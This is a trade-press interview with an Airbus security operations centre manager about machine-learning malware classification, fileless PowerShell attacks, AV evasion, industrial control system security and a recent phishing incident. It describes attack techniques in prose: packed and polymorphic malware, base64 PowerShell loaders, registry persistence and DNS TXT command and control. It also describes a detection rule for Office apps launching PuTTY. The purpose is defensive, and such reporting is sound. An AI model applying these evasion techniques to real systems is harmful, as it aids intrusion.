When it comes to protecting physical assets from cyber-attacks, the defence sector faces some of the most sophisticated cyber-threats created. SC Media UK spoke to Lloyd Rush, the UK Cyber Defence Centre manager, Airbus Defence and Space, who runs the two UK SOCs to get a better idea about some of the threats faced such as the growth in Fileless attacks, as well as the use of AI by attackers and how SOCs are fighting back.
Airbus CyberSecurity secures many of the world's most secretive establishments including governments, military forces and critical national infrastructure organisations. That includes 90 percent of the UK's Ministry of Defence networks. It does so via its cyber-defence centres in France, Germany, Spain, the US, and two in the UK - Cyber Defence Centre in Newport and its military site, the Global Operations Security Coordination Centre at MOD Corsham - all working together. The company employs some 700 cyber-specialists and achieves a turnover of more than €100 million.
Work undertaken includes government grade crypto, used in re-keying of aircraft for the military, crypto and field guns for Typhoon fighter jets - with Rush mentioning that recent successes including taking the time to re-key Typhoons down from 10 minutes to 90 seconds - with weapons and refueling the longest part of the process.
Rush explained to SC Media UK: “The strategy of the organisation is to pivot toward enterprise cyber-security, primarily through its SOCs in Abu Dhabi (its Middle East HQ), its Paris HQ, and UK SOC in Newport, working together to protect European customers in ‘safety critical' industry segments.” It's not so much banks or retail as looking at Airports, utility companies, power generation companies, military, and government. These are establishments where there's a security and safety element to their cyber-footprint, and often where there is also an industrial control system element. Newport has a research lab looking solely at Cyber Security, looking at crypto as a way to potentially secure ICS systems, looking at how you do maturity checks for organisations.
Lloyd Rush, UK Cyber Defence Centre manager, Airbus Defence and Space
It has recently partnered with SITA (an air transport services company owned by different airlines/airports and other such as Airbus) to provide a dedicated aviation SOC which is believed to be the first dedicated aviation SOC, targeted at aviation customers, primarily covering airports worldwide.
Looking at future developments this year at Defcon Airbus demonstrated an OpenAI Framework (machine-learning Cloud Environment) based on machine learning to customise malware and make it undetectable - and it reported how 16 percent of samples submitted evaded even next generation AV and sandboxing technologies.
Rush continues: “Going forward the tools and technologies that we are using to counter this threat would still stand up. When we look at machine learning applied to those practices, these are the algorithms that machines go and look for and with every new sample that we can detect, we can put that into our tooling and better learn what's being used to attack us. And that has a cost to the attacker and has no increase to our overhead in the SOC which continues to improve our tooling, and we are also putting good executables within there as well so improving our understanding of the footprint, and the ever changing applications out there as well. And through that you can work out the Malware classification (using Self Organising Feature Maps (SOM) and Machine Activity Data). So we are asking the question, is it malign, isn't it malign, and if we can get that answer very accurately we are in a good place.”
SOM is part of productisation of proof of concept work created at the Airbus centre of excellence in cyber-security analytics at the University of Cardiff, in association with they Airbus Digital Transformation office in the Newport office building. It provides malware classification using self-organising feature maps and machine activities. It takes the executable and looks at what it does over a period of time - looking at processes, memory, swap use, packets received, packets sent and it compares them to what it knows as being good and it compares to what it knows as being bad and rearranges what it finds into a 2-D map of 50 pixels by 50 pixels. Among the known bads, if it hits a hot spot known to be bad it will give it a score, from clearly bad to marginal. It can sit and look at malware binaries and in initial testing it is reported to have a 95 percent success rate in achieving positive identification of malware based on this mapping.
Within the SOC Airbus is looking at automation and machine learning as Rush explains: “At level one we want to automate as much as possible to free up skills; Soc analysts not cheap, and this enables them to be involved in the threat hunt to spot the unknowns or setting the criteria and being able to detect when it steps outside of that. It's about clarity of view and by looking at the end points and user behaviour analysis, that becomes the cornerstone for both our processes and the technology, and that's the piece we're moving forward with.”
SC asked that even with these innovations, if an attacker knows that you have shown what good looks like, will attackers not just use machine learning to, so far as possible, appear in the ‘known good' category?
Rush responded: “That's looking at timing, so not around delivery, it's on execution. At some point it [the malware] has to reveal its cards and execute, and it's those actions that make it very difficult to hide - when you feed in lots of known good - by definition it's going to step outside of that. So long as you put enough samples in there it will be detected. If you deliver the malware and it only ever does good, it's not really malware.”
Rush went on to say that it's not necessarily about exfiltration of data, and it could be anything. The system is not really interested in protocols or what's in packets but the burst of action. If it sleeps for a while and then starts, it will give out indicators. The tools are doing the classification [of its actions] so, if you put enough samples in there it, will learn those new bad habits - and what was once green becomes amber - somewhere in between red and green.
What about attackers disrupting your own information flow with false readings like Stuxnet? Rush agreed, “There is a trend of the dropping of red herrings; it has been observed where the injection into memory is well hidden, as is the sprang of some of the commands, or sending those commands into the registry. But we have also seen where the adversary is dropping a tool or a technique of another group, another style, particularly we have seen the financial cyber-criminal mimic some of the tools and techniques of the some of the nation states, and actually made it very overt when doing so. For the uncontrolled (untrained) eye you can jump in and say, yeah I've got the solution. If you stop focussing in on trying to get exactly this type and step back and look at it in a more generic approach, you are saying what constitutes bad, what's normal, which machines should be talking to which machines. All of a sudden we are seeing Powershell running at six in the morning, when the adversary makes a mistake; we are all human, we all make mistakes. And it's those little trigger points that are key.”
And what about the idea of true artificial intelligence - including ‘sentient malware?' What's in it for defenders and our adversaries?
Rush agreed that a lot of AI is hypothetical and sits with the academics. “For the moment we are reactive - and reactive to what we see, and we are also trying to predict. As with AI, I have not seen any evidence yet within the SOCs of that coming forward. As we better understand it we'll come up with the strategies [to fight it].
“There is extremely clever machine learning. But that [true AI] is going to be quite a gear change, and cloud computing becomes an enabler. It is very hypothetical at the moment.
[We do have] Machine learning using big data. In the SOC we get accused of wanting more of everything, more data,more logs, but the more logs and data sources you have the more accurate you can predict and reduce false positives as well which is important. It comes down to the basics as well. It doesn't have to be really smart, and really clever around automation and some of those algorithms and some of those bits and pieces we put in there. We have different levels of analysts - one, two and three, with the third line analysts engaged in that threat hunt, and we need someone to do that continuous monitoring, looking at all those data sets, and its putting that learning into the tooling so when customer alerts and user alerts come to screen it has playbooks telling them what meta data to go and check, what to attach to the incident, so we are increasing our speed of response to the customer as time is extremely critical. And we need to make sure all the right information is gathered at the time and it escalates. At the second line and we start making severity categorisation, and then escalate that to an incident.”
SC also asked, so how do you introduce innovative new technology based on learning with no initial track record of known good?
Rush replied: “There's always an element of fine-tuning and understanding to be built up. While they're implementing [new tech] you've got that added complication, they're generally being administered through their installation, so there's that settle-down period when you've actually got the real end user. And then understanding that normalisation. Every piece of new technology presents new challenges. It's something we are very used to.
“Also, the diversity of the attack footprint is greatly expanding with every new piece of technology.
“We protect this niche of companies that have a similar way of doing things. Production, manufacturing, more connected devices than banking systems. So those analysts are specialised around those industries.
“Looking through our clients,it's also doing the threat intelligence - which isn't intelligence if it isn't actionable - which may be a cliche but it's so true. It's how you take that threat intel and make it actionable. The use cases are exactly that. If you bring that down to the business context there's no point me coming to you about a threat on CISCO if you don't use CISCO, you're not interested in that. Its building, what the threats are and the attack footprint. Who the adversaries are, what their objectives are and how are they going to achieve that. If we can map that back it becomes a chain and if that chain can lead back to the attacker and his objective, and if we can break that link at any place, it can trombone back to the attacker, as they are coming from multiple vectors as that attack surface has expanded.
“At this end there may be many thousands of links, but as we get closer there may be only one or two links and if we can mitigate or break those links and put strong protection measures around there, it's this continual reevaluation of cyber-risk within a business. Its working out how you best balance those mitigations.”
You work in this world of industrial controls but they are notorious for using old equipment and systems that were once isolated and now connected and vulnerable to adversaries using top end attacks - how do you reconcile that? asked SC.
Rush replied: “The Good news is old tech is not running Powershell. It becomes very specialist with different systems used including proprietary. In best practice they are all put into different security zones. Ultimately in an enterprise network, at the top end, there should not be those connections. We give ‘best advice' to clients but whether they chose to take that advice is up to them. We also use defensive monitoring which can assess that threat, so clients understand that attack footprint.
“Unlike enterprises - which are quite mature and everyone know what's there, ICS customers often need to map out what estate they currently have as the first step. Many of our customers go through that because they don't even know what their vulnerabilities are, what's connected to the internet and what's not connected, how many devices they have in say an oilfield in the Middle East. For us the first step is figuring out a smart way to map those devices before we say ‘how do we protect them.'”
SC also asked, for your ICS customers, how real is the threat of Ransomware of things?
Rush replied: “It's one of those hypothetical things, there's been reports, it makes sense - there's certainly a path there and it's absolutely viable. Our defensive measures that sit out there and good husbandry will help. There's also DDoS ransoms - if someone puts value in that data and you can disrupt that, then there's big business while there is money to be made. And the criminals will always be looking for the next thing. As with WannaCry, NotPetya, and the collateral mess behind that.
“We have our own protective arm and system to protect Airbus industrial controls It starts with [defence agains] nation states but as with all things it moves on to financial gain. That's why we put so much emphasis there [in cyber-protection for ICS], though its a nascent market with not a huge demand yet.”
In response to the question, will GDPR affect the market, eg, will you have to report a breach which isn't a data breach? Rush replied, “We'll soon see a lawyer in the SOC” to decide what is and is not reportable.
“Its up to companies how they do that - we would advise responsible disclosure. We can learn from the past every time, and with that we can predict. We would take that incident and pass that on to the client [for them to decide what they do with it].”
It's one things for companies to defend themselves, but SC asked, are critical infrastructure attacks acts of war where the government should lead the defence?
Rush replied: “Government will speak for themselves but there is already significant government expenditure on cyber-defence to lead the way, and we are on a number of bodies working with UK government. Things like CPNI and nuclear - it is something they are taking seriously, and we work with them on that.
“There is this secondary issue for warfare. For every 100 nautical miles your carrier goes into a certain region you get rolling blackouts and I think we may see that sort of scenario in the future.”
SC noted that there have been allegations that if was GPS spoofing that caused US warship crashes earlier this year and asked, does this show transport is potentially on the front line?
Rush responded: “That applies to businesses at all levels right from the SMEs. If you look at the SMEs, typically they need to turn to automation to deliver things within budget, and its a difficult balance to strike their cyber-risk. Again, the UK government, through NCSC etc, is cascading down to business, and I think that that's a great thing and that should be encouraged and shouted from the treetops. If all businesses understand that threat, and what they can afford, and understand those best practices, then we are all in a better state. And also reporting at that level, getting everybody contributing to these indicators of compromise, and also understanding and learning from breach history will definitely help us see what's coming over the hill. Particularly around some of the hypothetical stuff coming in the future.”
SC mentioned we knew of global players who had failed to upgrade all XP installations due to cost - and asked, what could be done? Rush said: “If you look at a global enterprise that's a problem - the OS vendor has made a decision not to support a product that's widespread - and replacing infrastructure does take time, especially in businesses that are extremely critical - where downtime is expensive. It's about understanding that risk and re-evaluating that risk and working with the vendors.”
It was also noted how a lot of OT environments - unlike IT - where you say you are going to be down for 3 am to 6am whatever, you can't necessarily switch off those OT systems to do an upgrade, a check or vulnerability analysis or pen testing so this is where businesses need to look holistically how they trade off security against operational and financial considerations.
Discussion turned to threat trends, and Rush told SC that to understand the trends in attacks being seen by Airbus, it is first necessary to look at traditional evasion techniques, malware and how cyber-attacks are becoming increasingly sophisticated, on all rungs of the ladder, so that blurring of traditional nation state attacks with those from cyber-criminals with financial motivation has been increasingly seen, particularly since 2014, then more so in 2016, and through into 2017.
Rush also commented, “It does include nation states subcontracting to criminal groups but also, some schools of thought are saying that the traditional nation state sponsored actors are now investing some of their time in some of the financial stuff,” though he says that Airbus is doesn't tend to look at final attribution.
In relation to changes in the type of threat faced, Rush comments, “If we look at some of the traditional malware execution, we have a piece of malware that will run on the hard drive, it will execute just like any other programme, and traditionally antivirus was the first line of defence. But we, collectively as a cyber-security community, questioned whether anti-virus was enough, and we're clear what the outcome is.
“If we look at the assembly - this is brbbot.exe, we've got elements in the memory, it's readable, its static, and through that the antivirus engines can work out that there are indicators in there that there is some malign behaviour.
“If we present that executable to an online website that I run that across a number of AV vendors, McAfee detected this as a generic download (not calling out McAfee in particular), Kaspersky picks it up as a trojan, Norton picks it up as a Trojan, and there is generally a good success there. That's a really bad outcome for the adversary, so the adversary went and started encrypting and packing malware, mutating it in such a way that it becomes more difficult for the AV to pick up.”
It was explained that even within this encrypted form, if its static its detectable - even with long complicated strings of DNA, there are elements within those strings that are identifiable, that give us these generic downloads or generic trojans which is again a bad outcome for the attacker. The attackers went from there into polymorphic malware within which, each time it starts up, it is re-encrypted so it has a different key. But essentially when its de-encrypted it has the same behaviours, the same payloads.
Rush adds, “15 years ago polymorphic was the thing that scared us the most. Whereas now we are reasonably comfortable with polymorphic (attacks). But actually [the issue is], being able to mutate - and in malware as a service, it isn't difficult to do, you don't have to be technical, you just have to know where to look, where to download, and press the right buttons. For as little as US$300 (£225) you can have an exploit kit to run statically at home, installing it on a website, but using that tooling it's quite simple to further mutate that malware. So we've taken that brbbot and applied some basic encryption to that assembly and you can see [shows slide] the code looks very, very different. And anti-virus engines will look at it and handle it differently depending whether it's traditional antivirus or next gen AV.”
Easy to use UI includes graphics and dashboards for non-technical users. Popular kits include:
Pheonix Exploit Pack
Rush adds, “We present that executable into the same online tool and we can see that the encrypted version has not been detected by some of the basic engines - more than one did not detect it. Among those that did, Kaspersky for example, we compare with those that didn't and that's the difference between standard and next gen and typically Kaspersky is using sandbox technology in there so they are allowing the file to run and looking at what falls out the other end. It's gone through all its de-encryption, its run, yes its malware - it's a generic trojan, whereas McAfee has done that quickly and it's about trying to detect at speed and it hasn't picked that up. So that becomes a bad outcome for the defenders.
“We need to find the next step. And that's whitelisting. Whitelisting is extremely effective if we understand its limitations. With whitelisting you take the executables that you want to run on the system and you basically put them in a locker, and they are the only executables that will run on the system so if one of these mutated executables drops onto your drive then it will say ‘no you can't run' even though the anti-virus hasn't detected it, as such it just puts it away and quarantines it off. So the adversary then looks at ‘how can I execute our code with this whitelisting in place?'
“And the way the adversary can do that is through thread injection. The way they do that is that to inject the payload or code; it will use existing applications that are allowed to run - popularly referred to as ‘feeding off the land' using the common commands that are used, through tooling. Typically PowerShell, which is the modern version of your command lines. It allows you to interface with the operating system to clear the administrators' power users, to administer your basic admin functions. It becomes very difficult when running in memory - what we call ‘fileless' attacks. It is also ‘non-malware' because there is no file, but its installing, using powershell to inject directly into memory.
"As elsewhere, delivery is usually via spear-phishing with embedded scripts in word documents or a browser vulnerability in Java Script, Office Macros, VBScript, Flash, fired by clicking a link, be that by mass phishing, something like Dridex or something more recent. Where attackers are getting good returns is some of the financial attacks.
“It's worth putting in a little more investment, in looking into your target and putting something out there that's a bit more relevant, putting a bit more bait on the hook. Essentially some of this malware as a service, or exploit kits will be running on these websites and will look for vulnerabilities and run that into memory,” says Rush, continuing: “These fileless attacks have a reduced forensic footprint - they're running in real time, don't touch the hard drive.
“It was a surprise in the community that the attackers took this approach because there's a massive trade off in persistence. If you turn your laptop, PDA or whatever endpoint device off, as soon as that memory has gone the file's gone, and that obviously caused an issue. More recently we've seen persistence being maintained by not just injecting the payload into the running memory, but actually putting elements of the code and spraying that into the registry using something which is like Powershell, like Powershell's little brother. It's just as powerful but its not as well understood by many communities but it's well understood by the adversaries. It's hiding that payload now in the registries which has been much harder to find. Command and control can be achieved via misuse of common protocols such as NDS - specifically the DNS TXT field - unformatted text responses in DNS lookups."
So is that game over? “Absolutely not - we are looking at mitigations around these fileless and Powershell attacks and right at the top is around good user cyber-threat awareness. That has to come right the way through the business no matter what size the business is, ensuring you've got that buy-in, at all levels from the exec office down to the engineers that are installing and putting in updates to those that are looking at their social media during lunch break and exposing their footprint further.
“A couple of other things are the ‘patch early, patch often' and that will avoid nearly 85 percent of attacks. If I were to bet on the best solution to this I would say behaviour analytics and its because:
“It's the user behaviour; it's the endpoint behaviour, it's the network behaviour. If we can can organise and understand each of these, the daily and monthly routines, and something steps outside that usual behaviour it can become really obvious. What we can do is identify these indicators of compromise and put that into our tooling and get that into the mindset of the SOC analysts and engineers."
Mitigating Fileless Attacks:
Good user cyber threat awareness
Patch often, Patch early
Disable macros in document attachments received via emai
Least privilege for users
Block websites hosting exploit kits
Email content inspection
Enhanced endpoint protection including registry and memory protection
“Then what we can start doing is actual hunting for suspicious transactions thought these indicators of compromise and its these behavioural changes and the transaction training that we start to look for within the tooling, which step outside of usual behaviour for that user, the endpoint and the network.
“As an example here is typical tool we are using within the SOC, commercial off the shelf Splunk, but there is a rule here that we have set up, looking at lots and lots of different log sources.
“There's a huge datalake that we collect for each of the clients and within there we have a set number of use-cases that we can customise. These are things we are coming up with to mitigate things like the fileless and powershell attacks. Typically they are looking at suspicious office activity. Looking at work and excel, eg Excel starting off a VPN, starting off PuTTY, a communication tool, which generally you wouldn't want to see.
Use of AI can allow SOC staff to concentrate on decision making related to real threats
“Looking at a real life example from last week (early September), using those same rules, one of the analysts was alerted to a suspicious chain, and on further investigation we found that we also had a host attack on some of the commercial tooling - in this case FireEye. From dynamic analysis within the web, it was delivered in mail, but it was sufficiently sophisticated that the mail system hadn't initially picked it up. It was the secondary communication in the web that had when we looked at how it had achieved this. And this is typical of what we are seeing. We used to associate this typically more with the advanced nation state, or the high end financial attacker or threat actor.
“The Word document had embedded code, base 64 encoded, and one of the lovely things about Powershell is it natively decodes base 64, so there is a bit of an indicator there that things aren't quite right but we can can also see that our Word document is spawning powershell XE, a whitelisted programme so it's going to be able to run. When we decoded the initial call it was still quite difficult to read, using a number of different obfuscation methods, using a set of arrays and splits, and its trying to hide things so its using escapes that the programming language just won't read.
“If we remove all of that and put it in what Powershell will actually run on it becomes more ‘human readable' and we can see what the objectives were and what it's trying to do. Essentially the powershell runs some randomisation and within there it goes out and contacts five websites, and attempts to call down an executable that it's going to spray into memory. At this point we have got to block so we've broken the communication. We've taken a look at those domains, and this is a good way to look at how effective this method is within the Airbus SOC, in that we look at the reputation of those domains, eg most people are aware of the likes of Spamhouse and so on, but we only have one read against all of those, so we are ahead of the game.
“Generally these will be reported on, taken down and they'll be altered. Obviously best practice is to pass details on and we have passed on these details through the SIFF chain etc, alerting other communities that this bad is out there and is being served on these sites. If this was on a client[site] the important piece for us would be the incident response at the client, and what's happened out there and so right at this point, the final attribution and what it does, the real truth rather than what may have happened.”
Rush concluded on a positive note, pointing out that ICS is not just hanging there on the internet undefended. That generally best practice is quite good, but of course they're not the ones that make the news. It's the mistakes, the ones that haven't quite got there that we hear about - but that is not the norm.